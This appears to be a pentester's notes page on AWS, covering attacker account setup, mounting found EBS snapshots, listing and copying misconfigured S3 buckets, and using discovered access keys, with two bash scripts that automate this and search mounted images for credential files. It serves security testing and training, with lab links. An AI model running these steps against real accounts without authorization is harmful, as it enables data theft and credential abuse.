CSbyGB - Pentips
AWS


Last updated 1 year ago

How to create an AWS account

In order to query an S3 bucket with misconfigured permissions, for example one whose ACL grants access to any authenticated AWS user (the "AuthenticatedUsers" group, i.e. anyone who owns an AWS account, not only the bucket owner), we need an account and an IAM user of our own (this is free).

  1. Create a free account on Amazon (check out the resources below for help with this step).

  2. Head to the IAM console: https://console.aws.amazon.com/iam/

  3. Go to "Users" > "Add users" and follow the whole process; it is pretty straightforward, refer to this documentation if you hesitate on a step. Create an access key for the user (under its "Security credentials" tab), since we will use it from awscli: the secret access key is displayed only once, at creation time.

  4. Keep all the information about your user (access key ID, secret access key, account ID) in your password manager; you will need it for awscli.

  5. In order for your user to be able to query other buckets you need to give it permissions. You can do this by adding it to a group. Go to your user:

  • Click on the tab "Groups"

  • Click on "Add user to groups"

  • Click on "Create group", give it a name and attach one of the premade permission policies (I chose the one called AdministratorAccess). For bucket enumeration AmazonS3ReadOnlyAccess is enough, and it is the safer choice: a key that can only list and read S3 does not hand over your whole account if it ever leaks in a report, a screenshot or a shell history.

  • Name your group, add your user to it and you should be good to go!

Create an EC2 instance

If you stumble on an EBS snapshot during a pentest (a public one, or one shared with your account), you cannot read it directly: you need to create a volume from it, attach that volume to an EC2 instance you control in the same region, and mount it from there.

This part is taken from executeatwill's walkthrough of flAWS.cloud. You can read it here.

  • Ensure under AWS IAM that the needed permissions are attached to your user (the walkthrough uses AdministratorAccess; EC2 permissions are all this step actually needs).

(screenshot: Administrator access)

  • Launch a new EC2 instance in the region of the snapshot you found (a volume can only be created from a snapshot that lives in the same region).

(screenshot: new instance)

  • Select "Free Tier".

(screenshot: Free tier)

  • Under network, I recommend that you authorize SSH traffic only from your IP range (0.0.0.0/0 authorizes anyone on the internet, and this instance is about to hold a copy of the client's data).

  • Under "Add storage", add a volume and put the ID of the snapshot you found (snap-...) in its snapshot field; the volume must be at least as large as the snapshot.

(screenshot: Add storage)

  • Now you just need to ssh to your new instance and mount the volume created from the snapshot: find its device name with lsblk, then mount it read-only so that nothing on the image is altered or executed.

Once you're done, I recommend that you delete the volume and any copy of the snapshot you made in your own account, and terminate the instance: otherwise it keeps costing money and keeps client data in your account.
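The same procedure driven from the CLI, with the mount and cleanup steps the console walkthrough only mentions. It is an added example written for this page, not code from the original author or from executeatwill's walkthrough; the snapshot ID, instance ID, profile and region are placeholders, and the lsblk sample is constructed:

```bash
#!/usr/bin/env bash
# Added example (not from the original page nor from the flAWS walkthrough it
# cites): CLI version of the snapshot steps above. Assumptions: SNAP is a
# snapshot ID found during enumeration, INSTANCE is an EC2 instance you
# launched in the snapshot's region, PROFILE/REGION are your own; all values
# below are placeholders.
SNAP="${SNAP:-snap-0123456789abcdef0}"
INSTANCE="${INSTANCE:-i-0123456789abcdef0}"
PROFILE="${PROFILE:-mine}"
REGION="${REGION:-us-west-2}"
aws_() { aws --profile "$PROFILE" --region "$REGION" "$@"; }

# Look before you copy: owner, size (your volume must be at least that big)
# and encryption (encrypted snapshots cannot be public and need the owner's
# KMS key, so create-volume fails on them).
describe_snapshot() {
  aws_ ec2 describe-snapshots --snapshot-ids "$SNAP" \
    --query 'Snapshots[0].[OwnerId,VolumeSize,Encrypted,Description]' --output text
}

# Run from your workstation: create a volume from the snapshot in the
# instance's AZ (same region as the snapshot, which is why the instance was
# launched there) and attach it. Prints the volume ID for cleanup.
attach_snapshot() {
  local az vol
  az=$(aws_ ec2 describe-instances --instance-ids "$INSTANCE" \
         --query 'Reservations[0].Instances[0].Placement.AvailabilityZone' --output text)
  vol=$(aws_ ec2 create-volume --snapshot-id "$SNAP" --availability-zone "$az" \
         --volume-type gp3 --query VolumeId --output text)
  aws_ ec2 wait volume-available --volume-ids "$vol"
  # /dev/sdf shows up as /dev/xvdf on Xen instances and /dev/nvme1n1 on Nitro.
  aws_ ec2 attach-volume --volume-id "$vol" --instance-id "$INSTANCE" --device /dev/sdf >/dev/null
  aws_ ec2 wait volume-in-use --volume-ids "$vol"
  echo "$vol"
}

# Run on the instance: from `lsblk -rno NAME,TYPE,MOUNTPOINT` on stdin, keep
# the partitions that are not mounted (the root disk is). A volume without a
# partition table has no "part" line: mount the disk device itself then.
unmounted_partitions() { awk '$2 == "part" && $3 == "" { print $1 }'; }

# Constructed sample of lsblk output once the volume is attached (Xen naming).
SAMPLE_LSBLK='xvda disk
xvda1 part /
xvdf disk
xvdf1 part'

# Mount read-only and without exec: nothing from a client's image should run
# on your box, and read-only keeps timestamps intact. A cloned XFS root carries
# the same UUID as yours, so retry with nouuid when the first mount is refused.
mount_readonly() {
  local part="$1" dir="/mnt/$1"
  sudo mkdir -p "$dir"
  sudo mount -o ro,noexec,nosuid,nodev "/dev/$part" "$dir" 2>/dev/null \
    || sudo mount -o ro,noexec,nosuid,nodev,nouuid "/dev/$part" "$dir"
  # First things to look at: keys, credential files, shell history.
  sudo grep -rIlE 'AKIA[A-Z0-9]{16}|aws_secret_access_key' "$dir" 2>/dev/null | head
  sudo find "$dir" -name '*.pem' -o -name 'id_rsa' -o -name '.bash_history' 2>/dev/null | head
}

# Detach and delete the volume so neither client data nor a bill stays in
# your account; terminate the instance afterwards if it existed only for this.
cleanup_volume() {
  local vol="$1"
  aws_ ec2 detach-volume --volume-id "$vol" >/dev/null
  aws_ ec2 wait volume-available --volume-ids "$vol"
  aws_ ec2 delete-volume --volume-id "$vol"
}

case "${1:-}" in
  describe) describe_snapshot ;;
  attach)   attach_snapshot ;;
  mount)    lsblk -rno NAME,TYPE,MOUNTPOINT | unmounted_partitions \
              | while read -r p; do mount_readonly "$p"; done ;;
  cleanup)  cleanup_volume "${2:?volume id required}" ;;
  *)        echo "usage: $0 describe | attach | mount | cleanup <vol-id>" >&2 ;;
esac
```

describe and attach run from your workstation; copy the script to the instance for mount; cleanup takes the volume ID printed by attach. The ro,noexec,nosuid,nodev options matter: a snapshot is an untrusted filesystem image, and mounting it read-only also keeps it usable as evidence.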

Connect to a bucket

  • If we found keys or buckets during enumeration, we need to check them and see if we can connect to them.

  • Install the AWS CLI: sudo apt install awscli

  • Create a profile with the access key ID, secret access key and default region of the user we created: aws configure --profile profilename (keep one profile per identity, so your own keys never get mixed with keys found on an engagement)

  • Check your current configuration: aws configure list

  • Check the config of a specific profile: aws configure list --profile profilename

  • List the content of a bucket as our user: aws s3 ls s3://target --profile profilename (this is the request that detects buckets open to "any authenticated AWS user")

  • List it anonymously, without signing the request: aws s3 ls s3://target --no-sign-request --region us-west-2 (a listing here means the bucket is open to everyone on the internet, not just to AWS account holders)

  • Copy a file from a bucket to our local directory: aws s3 cp s3://bucket/file . --profile profilename

  • Copy a full folder to our local directory: aws s3 sync s3://bucket/folder . --profile profilename

  • If you find an access key pair (access key ID and secret access key, e.g. in an open bucket, a git repository or a snapshot), configure it in a new profile with aws configure --profile profilename. Then run aws sts get-caller-identity --profile profilename first: it tells you which account and which user or role the key belongs to, needs no IAM permission at all, and is far less noisy than trying random services. If the key ID starts with ASIA it is a temporary credential and you also need its session token (aws configure set aws_session_token TOKEN --profile profilename); a key ID starting with AKIA is a long-term IAM user key.

  • Then, aws s3 ls --profile profilename lists the buckets owned by that account, and aws s3 ls s3://bucket --profile profilename the content of one of them.
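The checks of this section, from the unsigned listing to the sts call on a found key, as one script. This is an added example written for this page, not a script from the original author or from the flAWS CTF; the profile names, bucket references and key IDs in it are assumptions (the AKIA.../ASIA...EXAMPLE values are AWS's own documentation placeholders), the key-ID classification follows the prefixes AWS documents for IAM unique IDs, and the bucket-reference normalisation covers only the standard amazonaws.com hostnames, not dualstack or accelerate endpoints:

```bash
#!/usr/bin/env bash
# Added example (not from the original page): triage of buckets and keys found
# during enumeration with the AWS CLI. Assumptions: a bucket reference in one
# of the forms handled below and, optionally, a profile created with
# `aws configure --profile`; all names are placeholders.

# Classify an access key ID by its documented prefix: AKIA = long-term IAM user
# key (needs the secret only); ASIA = temporary STS key (also needs its session
# token, otherwise every call fails with InvalidClientTokenId).
classify_access_key() {
  local id="$1"
  if [ "${#id}" -ne 20 ]; then echo malformed; return; fi
  case "$id" in
    AKIA*) echo long-term ;;
    ASIA*) echo temporary ;;
    *)     echo unknown ;;      # AIDA/AROA are user/role IDs, not usable keys
  esac
}

# Normalise a bucket reference (s3:// URI, virtual-hosted or path-style URL,
# bare name) into "bucket region"; region is "-" when the reference has none.
bucket_name_from_ref() {
  local ref="$1" host path bucket region
  ref="${ref#s3://}"; ref="${ref#http://}"; ref="${ref#https://}"
  host="${ref%%/*}"
  path="${ref#"$host"}"; path="${path#/}"
  case "$host" in
    s3.amazonaws.com|s3-*.amazonaws.com|s3.*.amazonaws.com)
      bucket="${path%%/*}" ;;           # path-style: s3.<region>.amazonaws.com/bucket/key
    *.s3.amazonaws.com|*.s3-*.amazonaws.com|*.s3.*.amazonaws.com)
      bucket="${host%.s3*}" ;;          # virtual-hosted: bucket.s3.<region>.amazonaws.com/key
    *)
      bucket="$host" ;;                 # s3://bucket/key or a bare name
  esac
  region=$(printf '%s\n' "$host" \
    | sed -nE 's/^(.*\.)?s3[.-]([a-z]{2}-[a-z]+-[0-9]+)\.amazonaws\.com$/\2/p')
  printf '%s %s\n' "$bucket" "${region:--}"
}

# Probe a bucket the way the page does by hand, least privileged first.
triage_bucket() {
  local ref="$1" profile="${2:-}" bucket region opts=""
  set -- $(bucket_name_from_ref "$ref"); bucket="$1"; region="$2"
  [ "$region" != "-" ] && opts="--region $region"
  echo "[*] bucket $bucket (region $region)"
  # 1. Unsigned request: a listing here means the bucket is open to the world.
  if aws s3 ls "s3://$bucket" --no-sign-request $opts >/dev/null 2>&1; then
    echo "[+] anonymous listing allowed (AllUsers grant)"
  else
    echo "[-] anonymous listing denied"
  fi
  [ -n "$profile" ] || return 0
  # 2. Same listing as our own IAM user: allowed here but not above means the
  #    bucket trusts AuthenticatedUsers, i.e. any AWS account at all.
  opts="$opts --profile $profile"
  aws sts get-caller-identity $opts --output text      # who we are talking as
  if aws s3 ls "s3://$bucket" $opts >/dev/null 2>&1; then
    echo "[+] listing allowed as profile $profile"
  else
    echo "[-] listing denied as profile $profile"
  fi
  # 3. Why it is open: ACL grants and bucket policy are often readable too.
  #    Errors here are expected and not fatal.
  aws s3api get-bucket-acl --bucket "$bucket" $opts 2>/dev/null \
    | grep -E 'AllUsers|AuthenticatedUsers' && echo "[!] ACL grants a public group"
  aws s3api get-bucket-policy --bucket "$bucket" $opts --output text 2>/dev/null
}

# Store a found key pair in its own profile so it never mixes with your keys,
# then ask STS who it belongs to (works without any IAM permission).
add_profile_from_keys() {
  local profile="$1" key_id="$2" secret="$3" token="${4:-}"
  case "$(classify_access_key "$key_id")" in
    temporary) [ -n "$token" ] || echo "[!] $key_id is temporary: session token needed" >&2 ;;
    long-term) ;;
    *)         echo "[!] $key_id does not look like an access key ID" >&2 ;;
  esac
  aws configure set aws_access_key_id "$key_id" --profile "$profile"
  aws configure set aws_secret_access_key "$secret" --profile "$profile"
  [ -z "$token" ] || aws configure set aws_session_token "$token" --profile "$profile"
  aws sts get-caller-identity --profile "$profile"
}

case "${1:-}" in
  bucket) shift; triage_bucket "$@" ;;
  keys)   shift; add_profile_from_keys "$@" ;;
  *)      echo "usage: $0 bucket <ref> [profile] | keys <profile> <key-id> <secret> [session-token]" >&2 ;;
esac
```

Run it as ./s3triage.sh bucket https://target.s3.amazonaws.com/ profilename for a bucket, or ./s3triage.sh keys found AKIA... secret [token] for a key pair. The order matters: the unsigned request tells you whether the bucket is public to everyone, the signed one whether it trusts every AWS account, and get-caller-identity is the one call that is safe to make with unknown keys before touching anything else.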

Resources

AWS documentation

  • Create a free AWS account
  • Creating an IAM user in your AWS account
  • AWS Account and Access Keys
  • AWScli Documentation
  • AWS CLI EC2 Tutorial

Learning resources

General AWS resources and AWS Pentest

  • My AWS Pentest Methodology by Lizzie Moratti
  • AWS on Hacktricks
  • AWS on Pentest Book
  • Cloud - AWS Pentest - Payload All The Things
  • Securing AWS: Discover Cloud vulnerabilities via Pentesting Techniques
  • Hacking the cloud by frichette_n
  • AWS Cloud Penetration Testing Explained with Example - Cloud Security Podcast
  • AWS Goat Cloud Pentesting - Cloud Security Podcast
  • Getting Started with Hacking AWS ECS! - Cloud Security Podcast
  • GETTING STARTED WITH HACKING AWS CLOUD - Cloud Security Podcast
  • Cloud Security - Attacks by Joas Antonio Santos
  • Offensive cloud, AWS by Lutzenfried
  • 0xd4y by Segev Eliezer, with plenty of posts about AWS Pentest
  • Offensive Security AWS Guide - Joas A Santos
  • Finding Treasures in Github and Exploiting AWS for Fun and Profit - Part 1 - Bhagavan Bollina
  • Finding Treasures in Github and Exploiting AWS for Fun and Profit - Part 2 - Bhagavan Bollina
  • Pentesting Cloud part 1 "Open to the public" CTF Walkthrough by Pawel Rzepa
  • AWS Privesc exploring odd features of the Trust Policy
  • Cloud Hacking: Hacking Amazon AWS - NahamSec

Vulnerable labs to practice on

  • flAWS
  • flAWS2
  • CloudGoat - RhinoSecurityLabs
  • IAM Vulnerable - Bishopfox (you need to deploy it yourself)
  • AWSGoat - ine labs (you need to deploy it yourself in your own AWS account)

Writeups

  • My writeups on flAWS
  • My writeups on vulnmachines AWS cloud lab
  • AWS S3 CTF Challenges by Michael McCambridge

Create your lab

  • How to build a Cloud Hacking Lab - Beau Bullock

Tools

  • Cloudfox - Bishopfox
  • My arsenal of AWS Security tools by toniblyx
  • Pacu - RhinoSecurityLabs

AWS Security

  • AWS Security Study Plan - Jassics
  • Awesome AWS Security - Jassics
  • Breaking into Cloud Security by Nick Jones
  • Awesome Cloud Security by NextSecurity
  • Cloud Security Vulnerabilities - Ashish Rajan
  • AWS Security Notes by Segev Eliezer (0xd4y)
  • AWS Security Checklist

Example with the CTF made available by flAWS

(screenshot: flAWS)